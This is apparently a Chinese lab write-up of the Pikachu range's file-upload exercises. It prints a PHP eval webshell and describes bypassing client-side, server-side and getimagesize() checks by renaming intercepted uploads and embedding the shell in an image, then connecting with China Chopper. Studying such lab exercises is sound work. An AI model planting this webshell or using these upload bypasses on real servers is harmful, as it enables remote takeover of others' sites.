0x01 客户端check

新建一个1.jpg,内容是<?php @eval($_POST['test']);?>
选择1.jpg后,上传同时抓包
pikachu-文件上传
结果成功上传1.php文件
pikachu-文件上传
用中国菜刀连接
pikachu-文件上传
实际上这题是用前端js进行验证选择的文件是否为图片
pikachu-文件上传
pikachu-文件上传
所以我们把上面input的onchange属性删除就触发不了js代码了
pikachu-文件上传

0x02 服务端check

按照上题抓包改名方法能上传成功

0x03 getimagesize()

这题用图片合成木马绕过
我用edjpgcom直接合成了
pikachu-文件上传
可以看到这个一句话就藏在图片里
直接上传
pikachu-文件上传
访问一下
pikachu-文件上传
但他只是一张图片,无法执行php代码,这时候要用上前面文件包含漏洞包含他
可是当我想包含的时候报错了╮(╯▽╰)╭
pikachu-文件上传
参考文章

相关文章:

  • 2021-08-26
  • 2022-01-05
  • 2021-08-28
  • 2022-12-23
  • 2022-12-23
  • 2021-11-25
  • 2021-04-16
猜你喜欢
  • 2022-12-23
  • 2021-06-01
  • 2021-11-05
  • 2022-12-23
  • 2021-09-23
  • 2022-12-23
  • 2022-12-23
相关资源
相似解决方案